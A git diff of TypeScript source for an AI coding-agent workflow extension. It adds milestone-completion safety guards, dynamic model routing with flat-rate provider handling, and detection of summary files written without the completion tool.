-            missingSlices.push(slice.id);
+      // Safety guard (#2675): block completion when VALIDATION verdict is
+      // needs-remediation. The state machine treats needs-remediation as
+      // terminal (to prevent validate-milestone loops per #832), but
+      // completing-milestone should NOT proceed — remediation work is needed.
+      const validationFile = resolveMilestoneFile(basePath, mid, "VALIDATION");
+      if (validationFile) {
+        const validationContent = await loadFile(validationFile);
+        if (validationContent) {
+          const verdict = extractVerdict(validationContent);
+          if (verdict === "needs-remediation") {
+            return {
+              action: "stop",
+              reason: `Cannot complete milestone ${mid}: VALIDATION verdict is "needs-remediation". Address the remediation findings and re-run validation, or update the verdict manually.`,
+              level: "warning",
+            };
           }
         }
-        if (missingSlices.length > 0) {
-          return {
-            action: "stop",
-            reason: `Cannot complete milestone ${mid}: slices ${missingSlices.join(", ")} are missing SUMMARY files. Run /gsd doctor to diagnose.`,
-            level: "error",
-          };
-        }
+      }
+
+      // Safety guard (#1368): verify all roadmap slices have SUMMARY files.
+      const missingSlices = findMissingSummaries(basePath, mid);
+      if (missingSlices.length > 0) {
+        return {
+          action: "stop",
+          reason: `Cannot complete milestone ${mid}: slices ${missingSlices.join(", ")} are missing SUMMARY files. Run /gsd doctor to diagnose.`,
+          level: "error",
+        };
       }
 
       // Safety guard (#1703): verify the milestone produced implementation
       // artifacts (non-.gsd/ files). A milestone with only plan files and
       // zero implementation code should not be marked complete.
-      if (!hasImplementationArtifacts(basePath)) {
+      const artifactCheck = hasImplementationArtifacts(basePath);
+      if (artifactCheck === "absent") {
         return {
           action: "stop",
           reason: `Cannot complete milestone ${mid}: no implementation files found outside .gsd/. The milestone has only plan files — actual code changes are required.`,
           level: "error",
         };
       }
+      if (artifactCheck === "unknown") {
+        logWarning("dispatch", `Implementation artifact check inconclusive for ${mid} — proceeding (git context unavailable)`);
+      }
+
+      // Verification class compliance: if operational verification was planned,
+      // ensure the validation output documents it before allowing completion.
+      try {
+        if (isDbAvailable()) {
+          const milestone = getMilestone(mid);
+          if (milestone?.verification_operational &&
+              !isVerificationNotApplicable(milestone.verification_operational)) {
+            const validationPath = resolveMilestoneFile(basePath, mid, "VALIDATION");
+            if (validationPath) {
+              const validationContent = await loadFile(validationPath);
+              if (validationContent) {
+                // Allow completion when validation was intentionally skipped by
+                // preference/budget profile (#3399, #3344).
+                const skippedByPreference = /skip(?:ped)?[\s\-]+(?:by|per|due to)\s+(?:preference|budget|profile)/i.test(validationContent);
+
+                // Accept either the structured template format (table with MET/N/A/SATISFIED)
+                // or prose evidence patterns the validation agent may emit.
+                const structuredMatch =
+                  validationContent.includes("Operational") &&
+                  (validationContent.includes("MET") || validationContent.includes("N/A") || validationContent.includes("SATISFIED"));
+                const proseMatch =
+                  /[Oo]perational[\s\S]{0,500}?(?:✅|pass|verified|confirmed|met|complete|true|yes|addressed|covered|satisfied|partially|n\/a|not[\s-]+applicable)/i.test(validationContent);
+                const hasOperationalCheck = skippedByPreference || structuredMatch || proseMatch;
+                if (!hasOperationalCheck) {
+                  return {
+                    action: "stop" as const,
+                    reason: `Milestone ${mid} has planned operational verification ("${milestone.verification_operational.substring(0, 100)}") but the validation output does not address it. Re-run validation with verification class awareness, or update the validation to document operational compliance.`,
+                    level: "warning" as const,
+                  };
+                }
+              }
+            }
+          }
+        }
+      } catch (err) { /* fall through — don't block on DB errors */
+        logWarning("dispatch", `verification class check failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
 
       return {
         action: "dispatch",
@@ -629,8 +859,9 @@ export async function resolveDispatch(
   try {
     const registry = getRegistry();
     return await registry.evaluateDispatch(ctx);
-  } catch {
+  } catch (err) {
     // Registry not initialized — fall back to inline loop
+    logWarning("dispatch", `registry dispatch failed, falling back to inline rules: ${err instanceof Error ? err.message : String(err)}`);
   }
 
   for (const rule of DISPATCH_RULES) {
diff --git a/src/resources/extensions/gsd/auto-loop.ts b/src/resources/extensions/gsd/auto-loop.ts
index 74fcc8f16..6400e9871 100644
--- a/src/resources/extensions/gsd/auto-loop.ts
+++ b/src/resources/extensions/gsd/auto-loop.ts
@@ -13,4 +13,4 @@ export { resolveAgentEnd, resolveAgentEndCancelled, isSessionSwitchInFlight, _re
 export { detectStuck } from "./auto/detect-stuck.js";
 export { runUnit } from "./auto/run-unit.js";
 export type { LoopDeps } from "./auto/loop-deps.js";
-export type { AgentEndEvent, UnitResult } from "./auto/types.js";
+export type { AgentEndEvent, ErrorContext, UnitResult } from "./auto/types.js";
diff --git a/src/resources/extensions/gsd/auto-model-selection.ts b/src/resources/extensions/gsd/auto-model-selection.ts
index 5523854d3..7dc1593f8 100644
--- a/src/resources/extensions/gsd/auto-model-selection.ts
+++ b/src/resources/extensions/gsd/auto-model-selection.ts
@@ -4,18 +4,44 @@
  * and fallback chains.
  */
 
+import type { Api, Model } from "@gsd/pi-ai";
 import type { ExtensionAPI, ExtensionContext } from "@gsd/pi-coding-agent";
 import type { GSDPreferences } from "./preferences.js";
 import { resolveModelWithFallbacksForUnit, resolveDynamicRoutingConfig } from "./preferences.js";
 import type { ComplexityTier } from "./complexity-classifier.js";
 import { classifyUnitComplexity, tierLabel } from "./complexity-classifier.js";
-import { resolveModelForComplexity, escalateTier } from "./model-router.js";
+import { resolveModelForComplexity, escalateTier, getEligibleModels, loadCapabilityOverrides } from "./model-router.js";
 import { getLedger, getProjectTotals } from "./metrics.js";
 import { unitPhaseLabel } from "./auto-dashboard.js";
 
 export interface ModelSelectionResult {
   /** Routing metadata for metrics recording */
   routing: { tier: string; modelDowngraded: boolean } | null;
+  /** Concrete model applied before dispatch so it can be restored after a fresh session. */
+  appliedModel: Model<Api> | null;
+}
+
+export function resolvePreferredModelConfig(
+  unitType: string,
+  autoModeStartModel: { provider: string; id: string } | null,
+) {
+  const explicitConfig = resolveModelWithFallbacksForUnit(unitType);
+  if (explicitConfig) return explicitConfig;
+
+  const routingConfig = resolveDynamicRoutingConfig();
+  if (!routingConfig.enabled || !routingConfig.tier_models) return undefined;
+
+  // Don't synthesize a routing config for flat-rate providers (#3453).
+  if (autoModeStartModel && isFlatRateProvider(autoModeStartModel.provider)) return undefined;
+
+  const ceilingModel = routingConfig.tier_models.heavy
+    ?? (autoModeStartModel ? `${autoModeStartModel.provider}/${autoModeStartModel.id}` : undefined);
+  if (!ceilingModel) return undefined;
+
+  return {
+    primary: ceilingModel,
+    fallbacks: [],
+  };
 }
 
 /**
@@ -36,8 +62,9 @@ export async function selectAndApplyModel(
   autoModeStartModel: { provider: string; id: string } | null,
   retryContext?: { isRetry: boolean; previousTier?: string },
 ): Promise<ModelSelectionResult> {
-  const modelConfig = resolveModelWithFallbacksForUnit(unitType);
+  const modelConfig = resolvePreferredModelConfig(unitType, autoModeStartModel);
   let routing: { tier: string; modelDowngraded: boolean } | null = null;
+  let appliedModel: Model<Api> | null = null;
 
   if (modelConfig) {
     const availableModels = ctx.modelRegistry.getAvailable();
@@ -47,6 +74,27 @@ export async function selectAndApplyModel(
     let effectiveModelConfig = modelConfig;
     let routingTierLabel = "";
 
+    // Disable routing for flat-rate providers like GitHub Copilot (#3453).
+    // All models cost the same per request, so downgrading to a cheaper
+    // model provides no cost benefit — it only degrades quality.
+    // Fail-closed: if primary model can't be resolved, fall back to
+    // provider-level signals rather than allowing unwanted downgrades.
+    if (routingConfig.enabled) {
+      const primaryModel = resolveModelId(modelConfig.primary, availableModels, ctx.model?.provider);
+      if (primaryModel) {
+        if (isFlatRateProvider(primaryModel.provider)) {
+          routingConfig.enabled = false;
+        }
+      } else if (
+        (autoModeStartModel && isFlatRateProvider(autoModeStartModel.provider))
+        || (ctx.model?.provider && isFlatRateProvider(ctx.model.provider))
+      ) {
+        // Primary model unresolvable but provider signals indicate flat-rate —
+        // disable routing to prevent quality degradation.
+        routingConfig.enabled = false;
+      }
+    }
+
     if (routingConfig.enabled) {
       let budgetPct: number | undefined;
       if (routingConfig.budget_pressure !== false) {
@@ -83,7 +131,65 @@ export async function selectAndApplyModel(
           }
         }
 
-        const routingResult = resolveModelForComplexity(classification, modelConfig, routingConfig, availableModelIds);
+        // Load user capability overrides from preferences (D-17: deep-merged with built-in profiles)
+        const capabilityOverrides = loadCapabilityOverrides(
+          (prefs as { modelOverrides?: Record<string, { capabilities?: Record<string, number> }> } | undefined) ?? {},
+        );
+
+        // Fire before_model_select hook (ADR-004, D-03)
+        // Hook can override model selection entirely by returning { modelId }
+        let hookOverride: string | undefined;
+        if (routingConfig.hooks !== false) {
+          const eligible = getEligibleModels(
+            classification.tier,
+            availableModelIds,
+            routingConfig,
+          );
+          const hookResult = await pi.emitBeforeModelSelect({
+            unitType,
+            unitId,
+            classification: {
+              tier: classification.tier,
+              reason: classification.reason,
+              downgraded: classification.downgraded,
+            },
+            taskMetadata: classification.taskMetadata as Record<string, unknown> | undefined,
+            eligibleModels: eligible,
+            phaseConfig: modelConfig ? {
+              primary: modelConfig.primary,
+              fallbacks: modelConfig.fallbacks ?? [],
+            } : undefined,
+          });
+          if (hookResult?.modelId) {
+            hookOverride = hookResult.modelId;
+          }
+        }
+
+        let routingResult: ReturnType<typeof resolveModelForComplexity>;
+        if (hookOverride) {
+          // Hook override bypasses capability scoring entirely
+          routingResult = {
+            modelId: hookOverride,
+            fallbacks: [
+              ...(modelConfig?.fallbacks ?? []).filter(f => f !== hookOverride),
+              ...(modelConfig?.primary && modelConfig.primary !== hookOverride ? [modelConfig.primary] : []),
+            ],
+            tier: classification.tier,
+            wasDowngraded: hookOverride !== modelConfig?.primary,
+            reason: `hook override: ${hookOverride}`,
+            selectionMethod: "tier-only",
+          };
+        } else {
+          routingResult = resolveModelForComplexity(
+            classification,
+            modelConfig,
+            routingConfig,
+            availableModelIds,
+            unitType,
+            classification.taskMetadata,
+            capabilityOverrides,
+          );
+        }
 
         if (routingResult.wasDowngraded) {
           effectiveModelConfig = {
@@ -91,10 +197,23 @@ export async function selectAndApplyModel(
             fallbacks: routingResult.fallbacks,
           };
           if (verbose) {
-            ctx.ui.notify(
-              `Dynamic routing [${tierLabel(classification.tier)}]: ${routingResult.modelId} (${classification.reason})`,
-              "info",
-            );
+            if (routingResult.selectionMethod === "capability-scored" && routingResult.capabilityScores) {
+              // Verbose scoring breakdown for capability-scored decisions (D-20)
+              const tierLbl = tierLabel(classification.tier);
+              const scores = Object.entries(routingResult.capabilityScores)
+                .sort(([, a], [, b]) => b - a)
+                .map(([id, score]) => `${id}: ${score.toFixed(1)}`)
+                .join(", ");
+              ctx.ui.notify(
+                `Dynamic routing [${tierLbl}]: ${routingResult.modelId} (capability-scored) — ${scores}`,
+                "info",
+              );
+            } else {
+              ctx.ui.notify(
+                `Dynamic routing [${tierLabel(classification.tier)}]: ${routingResult.modelId} (${classification.reason})`,
+                "info",
+              );
+            }
           }
         }
         routingTierLabel = ` [${tierLabel(classification.tier)}]`;
@@ -126,11 +245,14 @@ export async function selectAndApplyModel(
 
       const ok = await pi.setModel(model, { persist: false });
       if (ok) {
-        const fallbackNote = modelId === effectiveModelConfig.primary
-          ? ""
-          : ` (fallback from ${effectiveModelConfig.primary})`;
-        const phase = unitPhaseLabel(unitType);
-        ctx.ui.notify(`Model [${phase}]${routingTierLabel}: ${model.provider}/${model.id}${fallbackNote}`, "info");
+        appliedModel = model;
+        if (verbose) {
+          const fallbackNote = modelId === effectiveModelConfig.primary
+            ? ""
+            : ` (fallback from ${effectiveModelConfig.primary})`;
+          const phase = unitPhaseLabel(unitType);
+          ctx.ui.notify(`Model [${phase}]${routingTierLabel}: ${model.provider}/${model.id}${fallbackNote}`, "info");
+        }
         break;
       } else {
         const nextModel = modelsToTry[modelsToTry.indexOf(modelId) + 1];
@@ -152,12 +274,17 @@ export async function selectAndApplyModel(
       const ok = await pi.setModel(startModel, { persist: false });
       if (!ok) {
         const byId = availableModels.find(m => m.id === autoModeStartModel.id);
-        if (byId) await pi.setModel(byId, { persist: false });
+        if (byId) {
+          const fallbackOk = await pi.setModel(byId, { persist: false });
+          if (fallbackOk) appliedModel = byId;
+        }
+      } else {
+        appliedModel = startModel;
       }
     }
   }
 
-  return { routing };
+  return { routing, appliedModel };
 }
 
 /**
@@ -192,9 +319,51 @@ export function resolveModelId<T extends { id: string; provider: string }>(
     );
   }
 
-  // Bare ID — prefer current provider, then first available
-  const exactProviderMatch = availableModels.find(
-    m => m.id === modelId && m.provider === currentProvider,
-  );
-  return exactProviderMatch ?? availableModels.find(m => m.id === modelId);
+  // Bare ID — resolve with provider precedence to avoid silent misrouting.
+  // Extension providers (e.g. claude-code) expose the same model IDs as their
+  // upstream API providers but route through a subprocess with different
+  // context, tool visibility, and cost characteristics (#2905).  Bare IDs in
+  // PREFERENCES.md must resolve to the canonical API provider, not to an
+  // extension wrapper that happens to be the current session provider.
+  const candidates = availableModels.filter(m => m.id === modelId);
+  if (candidates.length === 0) return undefined;
+  if (candidates.length === 1) return candidates[0];
+
+  // When the user's current provider is claude-code (set by startup migration
+  // or explicit selection), honour it for bare IDs.  Routing back to anthropic
+  // would undo the migration and hit the third-party subscription block (#3772).
+  if (currentProvider === "claude-code") {
+    const ccMatch = candidates.find(m => m.provider === "claude-code");
+    if (ccMatch) return ccMatch;
+  }
+
+  // Extension / CLI-wrapper providers that should not win bare-ID resolution
+  // when a first-class API provider also offers the same model AND the user
+  // has not explicitly chosen the extension provider.
+  const EXTENSION_PROVIDERS = new Set(["claude-code"]);
+
+  // Prefer currentProvider only when it is a first-class API provider
+  if (currentProvider && !EXTENSION_PROVIDERS.has(currentProvider)) {
+    const providerMatch = candidates.find(m => m.provider === currentProvider);
+    if (providerMatch) return providerMatch;
+  }
+
+  // Prefer "anthropic" as the canonical provider for Anthropic models
+  const anthropicMatch = candidates.find(m => m.provider === "anthropic");
+  if (anthropicMatch) return anthropicMatch;
+
+  // Fall back to first non-extension candidate, or any candidate
+  return candidates.find(m => !EXTENSION_PROVIDERS.has(m.provider)) ?? candidates[0];
+}
+
+/**
+ * Flat-rate providers charge the same per request regardless of model.
+ * Dynamic routing provides no cost benefit — it only degrades quality (#3453).
+ * Uses case-insensitive matching with alias support to prevent fail-open on
+ * provider naming variations (e.g. "copilot" vs "github-copilot").
+ */
+const FLAT_RATE_PROVIDERS = new Set(["github-copilot", "copilot", "claude-code"]);
+
+export function isFlatRateProvider(provider: string): boolean {
+  return FLAT_RATE_PROVIDERS.has(provider.toLowerCase());
 }
diff --git a/src/resources/extensions/gsd/auto-observability.ts b/src/resources/extensions/gsd/auto-observability.ts
index ddcc0bf3d..0715a9ac4 100644
--- a/src/resources/extensions/gsd/auto-observability.ts
+++ b/src/resources/extensions/gsd/auto-observability.ts
@@ -12,6 +12,7 @@ import {
   formatValidationIssues,
 } from "./observability-validator.js";
 import type { ValidationIssue } from "./observability-validator.js";
+import { parseUnitId } from "./unit-id.js";
 
 export async function collectObservabilityWarnings(
   ctx: ExtensionContext,
@@ -22,10 +23,7 @@ export async function collectObservabilityWarnings(
   // Hook units have custom artifacts — skip standard observability checks
   if (unitType.startsWith("hook/")) return [];
 
-  const parts = unitId.split("/");
-  const mid = parts[0];
-  const sid = parts[1];
-  const tid = parts[2];
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
 
   if (!mid || !sid) return [];
 
diff --git a/src/resources/extensions/gsd/auto-post-unit.ts b/src/resources/extensions/gsd/auto-post-unit.ts
index a841d8b22..b0bd77dd2 100644
--- a/src/resources/extensions/gsd/auto-post-unit.ts
+++ b/src/resources/extensions/gsd/auto-post-unit.ts
@@ -13,17 +13,19 @@
 
 import type { ExtensionContext, ExtensionAPI } from "@gsd/pi-coding-agent";
 import { deriveState } from "./state.js";
+import { logWarning, logError } from "./workflow-logger.js";
 import { loadFile, parseSummary, resolveAllOverrides } from "./files.js";
 import { loadPrompt } from "./prompt-loader.js";
 import {
   resolveSliceFile,
+  resolveSlicePath,
   resolveTaskFile,
   resolveMilestoneFile,
   resolveTasksDir,
   buildTaskFileName,
-  gsdRoot,
 } from "./paths.js";
 import { invalidateAllCaches } from "./cache.js";
+import { parseUnitId } from "./unit-id.js";
 import { closeoutUnit, type CloseoutOptions } from "./auto-unit-closeout.js";
 import {
   autoCommitCurrentBranch,
@@ -32,12 +34,13 @@ import {
 import {
   verifyExpectedArtifact,
   resolveExpectedArtifactPath,
+  writeBlockerPlaceholder,
+  diagnoseExpectedArtifact,
 } from "./auto-recovery.js";
-import { writeUnitRuntimeRecord, clearUnitRuntimeRecord } from "./unit-runtime.js";
-import { runGSDDoctor, rebuildState, summarizeDoctorIssues } from "./doctor.js";
-import { recordHealthSnapshot, checkHealEscalation } from "./doctor-proactive.js";
-import { syncStateToProjectRoot } from "./auto-worktree-sync.js";
-import { isDbAvailable } from "./gsd-db.js";
+import { regenerateIfMissing } from "./workflow-projections.js";
+import { syncStateToProjectRoot } from "./auto-worktree.js";
+import { isDbAvailable, getTask, getSlice, getMilestone, updateTaskStatus, updateSliceStatus, _getAdapter } from "./gsd-db.js";
+import { renderPlanCheckboxes } from "./markdown-renderer.js";
 import { consumeSignal } from "./session-status-io.js";
 import {
   checkPostUnitHooks,
@@ -46,9 +49,55 @@ import {
   persistHookState,
   resolveHookArtifactPath,
 } from "./post-unit-hooks.js";
-import { hasPendingCaptures, loadPendingCaptures } from "./captures.js";
+import { hasPendingCaptures, loadPendingCaptures, revertExecutorResolvedCaptures } from "./captures.js";
 import { debugLog } from "./debug-logger.js";
-import type { AutoSession } from "./auto/session.js";
+import { runSafely } from "./auto-utils.js";
+import type { AutoSession, SidecarItem } from "./auto/session.js";
+import { getEvidence } from "./safety/evidence-collector.js";
+import { validateFileChanges } from "./safety/file-change-validator.js";
+// crossReferenceEvidence available for future use when verification_evidence is stored in DB
+// import { crossReferenceEvidence, type ClaimedEvidence } from "./safety/evidence-cross-ref.js";
+import { validateContent } from "./safety/content-validator.js";
+import { resolveSafetyHarnessConfig } from "./safety/safety-harness.js";
+import { resolveExpectedArtifactPath as resolveArtifactForContent } from "./auto-artifact-paths.js";
+import { loadEffectiveGSDPreferences } from "./preferences.js";
+import { getSliceTasks } from "./gsd-db.js";
+import { runPreExecutionChecks, type PreExecutionResult } from "./pre-execution-checks.js";
+import { writePreExecutionEvidence } from "./verification-evidence.js";
+import { ensureCodebaseMapFresh } from "./codebase-generator.js";
+
+/** Maximum verification retry attempts before escalating to blocker placeholder (#2653). */
+const MAX_VERIFICATION_RETRIES = 3;
+
+
+/** Enqueue a sidecar item (hook, triage, or quick-task) for the main loop to
+ *  drain via runUnit. Logs the enqueue event and notifies the UI. */
+function enqueueSidecar(
+  s: AutoSession,
+  ctx: ExtensionContext,
+  entry: SidecarItem,
+  debugExtra: Record<string, unknown>,
+  notification?: string,
+): "continue" {
+  s.sidecarQueue.push(entry);
+  debugLog("postUnitPostVerification", {
+    phase: "sidecar-enqueue",
+    kind: entry.kind,
+    unitId: entry.unitId,
+    ...debugExtra,
+  });
+  if (notification) ctx.ui.notify(notification, "info");
+  return "continue";
+}
+/** Unit types that only touch `.gsd/` internal state files (no code changes).
+ *  Auto-commit is skipped for these — their state files are picked up by the
+ *  next actual task commit via `smartStage()`. */
+const LIFECYCLE_ONLY_UNITS = new Set([
+  "research-milestone", "discuss-milestone", "discuss-slice", "plan-milestone",
+  "validate-milestone", "research-slice", "plan-slice",
+  "replan-slice", "complete-slice", "run-uat",
+  "reassess-roadmap", "rewrite-docs",
+]);
 import {
   updateProgressWidget as _updateProgressWidget,
   updateSliceProgressCache,
@@ -57,17 +106,134 @@ import {
 } from "./auto-dashboard.js";
 import { existsSync, unlinkSync } from "node:fs";
 import { join } from "node:path";
-import { uncheckTaskInPlan } from "./undo.js";
-import { atomicWriteSync } from "./atomic-write.js";
 import { _resetHasChangesCache } from "./native-git-bridge.js";
 
-/** Throttle STATE.md rebuilds — at most once per 30 seconds */
-const STATE_REBUILD_MIN_INTERVAL_MS = 30_000;
+// ─── Rogue File Detection ──────────────────────────────────────────────────
+
+export interface RogueFileWrite {
+  path: string;
+  unitType: string;
+  unitId: string;
+}
+
+/**
+ * Detect summary files written directly to disk without the LLM calling
+ * the completion tool. A "rogue" file is one that exists on disk but has
+ * no corresponding DB row with status "complete".
+ *
+ * This is a safety-net diagnostic (D003). The existing migrateFromMarkdown()
+ * in postUnitPostVerification() eventually ingests rogue files, but explicit
+ * detection provides immediate diagnostics so operators know the prompt failed.
+ */
+// eslint-disable-next-line @typescript-eslint/no-explicit-any
+function hasNonEmptyFields(row: Record<string, any> | null, fields: string[]): boolean {
+  if (!row) return false;
+  return fields.some(f => String(row[f] || "").trim().length > 0);
+}
+
+const MILESTONE_PLANNING_FIELDS = ["title", "vision", "requirement_coverage", "boundary_map_markdown"];
+const SLICE_PLANNING_FIELDS = ["title", "demo", "risk", "depends"];
+
+export function detectRogueFileWrites(
+  unitType: string,
+  unitId: string,
+  basePath: string,
+): RogueFileWrite[] {
+  if (!isDbAvailable()) return [];
+
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
+  const rogues: RogueFileWrite[] = [];
+
+  if (unitType === "execute-task") {
+    if (!mid || !sid || !tid) return [];
+
+    const summaryPath = resolveTaskFile(basePath, mid, sid, tid, "SUMMARY");
+    if (!summaryPath || !existsSync(summaryPath)) return [];
+
+    const dbRow = getTask(mid, sid, tid);
+    if (!dbRow || dbRow.status !== "complete") {
+      rogues.push({ path: summaryPath, unitType, unitId });
+    }
+  } else if (unitType === "complete-slice") {
+    if (!mid || !sid) return [];
+
+    const summaryPath = resolveSliceFile(basePath, mid, sid, "SUMMARY");
+    if (!summaryPath || !existsSync(summaryPath)) return [];
+
+    const dbRow = getSlice(mid, sid);
+    if (!dbRow || dbRow.status !== "complete") {
+      // Auto-remediate: SUMMARY exists on disk but DB is stale — sync DB to
+      // match filesystem instead of reporting as rogue (#3633).
+      try {
+        updateSliceStatus(mid, sid, "complete", new Date().toISOString());
+      } catch {
+        // If DB update fails, fall back to rogue detection so the issue is visible
+        rogues.push({ path: summaryPath, unitType, unitId });
+      }
+    }
+  } else if (unitType === "plan-milestone") {
+    if (!mid) return [];
+
+    const roadmapPath = resolveMilestoneFile(basePath, mid, "ROADMAP");
+    if (!roadmapPath || !existsSync(roadmapPath)) return [];
+
+    const dbRow = getMilestone(mid);
+    const hasPlanningState = hasNonEmptyFields(dbRow, MILESTONE_PLANNING_FIELDS);
+
+    if (!hasPlanningState) {
+      rogues.push({ path: roadmapPath, unitType, unitId });
+    }
+  } else if (unitType === "plan-slice" || unitType === "replan-slice") {
+    if (!mid || !sid) return [];
+
+    const planPath = resolveSliceFile(basePath, mid, sid, "PLAN");
+    if (!planPath || !existsSync(planPath)) return [];
+
+    const dbRow = getSlice(mid, sid);
+    const hasPlanningState = hasNonEmptyFields(dbRow, SLICE_PLANNING_FIELDS);
+
+    if (!hasPlanningState) {
+      rogues.push({ path: planPath, unitType, unitId });
+    }
+
+    // Also check for rogue REPLAN.md
+    const replanPath = resolveSliceFile(basePath, mid, sid, "REPLAN");
+    if (replanPath && existsSync(replanPath) && !hasPlanningState) {
+      rogues.push({ path: replanPath, unitType, unitId });
+    }
+  } else if (unitType === "reassess-roadmap") {
+    if (!mid || !sid) return [];
+
+    const assessPath = resolveSliceFile(basePath, mid, sid, "ASSESSMENT");
+    if (!assessPath || !existsSync(assessPath)) return [];
+
+    // Assessment file exists on disk — check if DB knows about it via the artifacts table
+    const adapter = _getAdapter();
+    if (adapter) {
+      const row = adapter.prepare(
+        `SELECT 1 FROM artifacts WHERE path LIKE :pattern AND artifact_type = 'ASSESSMENT' LIMIT 1`,
+      ).get({ ":pattern": `%${sid}-ASSESSMENT.md` });
+      if (!row) {
+        rogues.push({ path: assessPath, unitType, unitId });
+      }
+    }
+  } else if (unitType === "plan-task") {
+    if (!mid || !sid || !tid) return [];
+
+    const taskPlanPath = resolveTaskFile(basePath, mid, sid, tid, "PLAN");
+    if (!taskPlanPath || !existsSync(taskPlanPath)) return [];
+
+    const dbRow = getTask(mid, sid, tid);
+    if (!dbRow) {
+      rogues.push({ path: taskPlanPath, unitType, unitId });
+    }
+  }
+
+  return rogues;
+}
 
 export interface PreVerificationOpts {
   skipSettleDelay?: boolean;
-  skipDoctor?: boolean;
-  skipStateRebuild?: boolean;
   skipWorktreeSync?: boolean;
 }
 
@@ -120,12 +286,12 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
 
   // Auto-commit
   if (s.currentUnit) {
+    const unit = s.currentUnit;
     try {
       let taskContext: TaskCommitContext | undefined;
 
       if (s.currentUnit.type === "execute-task") {
-        const parts = s.currentUnit.id.split("/");
-        const [mid, sid, tid] = parts;
+        const { milestone: mid, slice: sid, task: tid } = parseUnitId(s.currentUnit.id);
         if (mid && sid && tid) {
           const summaryPath = resolveTaskFile(s.basePath, mid, sid, tid, "SUMMARY");
           if (summaryPath) {
@@ -138,8 +304,9 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
                 try {
                   const { getTaskIssueNumberForCommit } = await import("../github-sync/sync.js");
                   ghIssueNumber = getTaskIssueNumberForCommit(s.basePath, mid, sid, tid) ?? undefined;
-                } catch {
+                } catch (err) {
                   // GitHub sync not available — skip
+                  logWarning("engine", `GitHub issue lookup failed: ${err instanceof Error ? err.message : String(err)}`);
                 }
 
                 taskContext = {
@@ -164,9 +331,14 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
       // `git worktree remove --force` during teardown.
       _resetHasChangesCache();
 
-      const commitMsg = autoCommitCurrentBranch(s.basePath, s.currentUnit.type, s.currentUnit.id, taskContext);
-      if (commitMsg) {
-        ctx.ui.notify(`Committed: ${commitMsg.split("\n")[0]}`, "info");
+      // Skip auto-commit for lifecycle-only units (#2553) — they only touch
+      // `.gsd/` internal state files. Those files are picked up by the next
+      // actual task commit via smartStage().
+      if (!LIFECYCLE_ONLY_UNITS.has(s.currentUnit.type)) {
+        const commitMsg = autoCommitCurrentBranch(s.basePath, s.currentUnit.type, s.currentUnit.id, taskContext);
+        if (commitMsg) {
+          ctx.ui.notify(`Committed: ${commitMsg.split("\n")[0]}`, "info");
+        }
       }
     } catch (e) {
       debugLog("postUnit", { phase: "auto-commit", error: String(e) });
@@ -174,137 +346,56 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
     }
 
     // GitHub sync (non-blocking, opt-in)
-    try {
+    await runSafely("postUnit", "github-sync", async () => {
       const { runGitHubSync } = await import("../github-sync/sync.js");
-      await runGitHubSync(s.basePath, s.currentUnit.type, s.currentUnit.id);
-    } catch (e) {
-      debugLog("postUnit", { phase: "github-sync", error: String(e) });
-    }
-
-    // Doctor: fix mechanical bookkeeping (skipped for lightweight sidecars)
-    if (!opts?.skipDoctor) try {
-      const scopeParts = s.currentUnit.id.split("/").slice(0, 2);
-      const doctorScope = scopeParts.join("/");
-      const sliceTerminalUnits = new Set(["complete-slice", "run-uat"]);
-      const effectiveFixLevel = sliceTerminalUnits.has(s.currentUnit.type) ? "all" as const : "task" as const;
-      const report = await runGSDDoctor(s.basePath, { fix: true, scope: doctorScope, fixLevel: effectiveFixLevel });
-      // Human-readable fix notification with details
-      if (report.fixesApplied.length > 0) {
-        const fixSummary = report.fixesApplied.length <= 2
-          ? report.fixesApplied.join("; ")
-          : `${report.fixesApplied[0]}; +${report.fixesApplied.length - 1} more`;
-        ctx.ui.notify(`Doctor: ${fixSummary}`, "info");
-      }
-
-      // Proactive health tracking — filter to current milestone to avoid
-      // cross-milestone stale errors inflating the escalation counter
-      const currentMilestoneId = s.currentUnit.id.split("/")[0];
-      const milestoneIssues = currentMilestoneId
-        ? report.issues.filter(i =>
-            i.unitId === currentMilestoneId ||
-            i.unitId.startsWith(`${currentMilestoneId}/`))
-        : report.issues;
-      const summary = summarizeDoctorIssues(milestoneIssues);
-      // Pass issue details + scope for real-time visibility in the progress widget
-      const issueDetails = milestoneIssues
-        .filter(i => i.severity === "error" || i.severity === "warning")
-        .map(i => ({ code: i.code, message: i.message, severity: i.severity, unitId: i.unitId }));
-      recordHealthSnapshot(summary.errors, summary.warnings, report.fixesApplied.length, issueDetails, report.fixesApplied, doctorScope);
-
-      // Check if we should escalate to LLM-assisted heal
-      if (summary.errors > 0) {
-        const unresolvedErrors = milestoneIssues
-          .filter(i => i.severity === "error" && !i.fixable)
-          .map(i => ({ code: i.code, message: i.message, unitId: i.unitId }));
-        const escalation = checkHealEscalation(summary.errors, unresolvedErrors);
-        if (escalation.shouldEscalate) {
-          ctx.ui.notify(
-            `Doctor heal escalation: ${escalation.reason}. Dispatching LLM-assisted heal.`,
-            "warning",
-          );
-          try {
-            const { formatDoctorIssuesForPrompt, formatDoctorReport } = await import("./doctor.js");
-            const { dispatchDoctorHeal } = await import("./commands-handlers.js");
-            const actionable = report.issues.filter(i => i.severity === "error");
-            const reportText = formatDoctorReport(report, { scope: doctorScope, includeWarnings: true });
-            const structuredIssues = formatDoctorIssuesForPrompt(actionable);
-            dispatchDoctorHeal(pi, doctorScope, reportText, structuredIssues);
-            return "dispatched";
-          } catch (e) {
-            debugLog("postUnit", { phase: "doctor-heal-dispatch", error: String(e) });
-          }
-        }
-      }
-    } catch (e) {
-      debugLog("postUnit", { phase: "doctor", error: String(e) });
-    }
-
-    // Throttled STATE.md rebuild (skipped for lightweight sidecars)
-    if (!opts?.skipStateRebuild) {
-      const now = Date.now();
-      if (now - s.lastStateRebuildAt >= STATE_REBUILD_MIN_INTERVAL_MS) {
-        try {
-          await rebuildState(s.basePath);
-          s.lastStateRebuildAt = now;
-          autoCommitCurrentBranch(s.basePath, "state-rebuild", s.currentUnit.id);
-        } catch (e) {
-          debugLog("postUnit", { phase: "state-rebuild", error: String(e) });
-        }
-      }
-    }
+      await runGitHubSync(s.basePath, unit.type, unit.id);
+    });
 
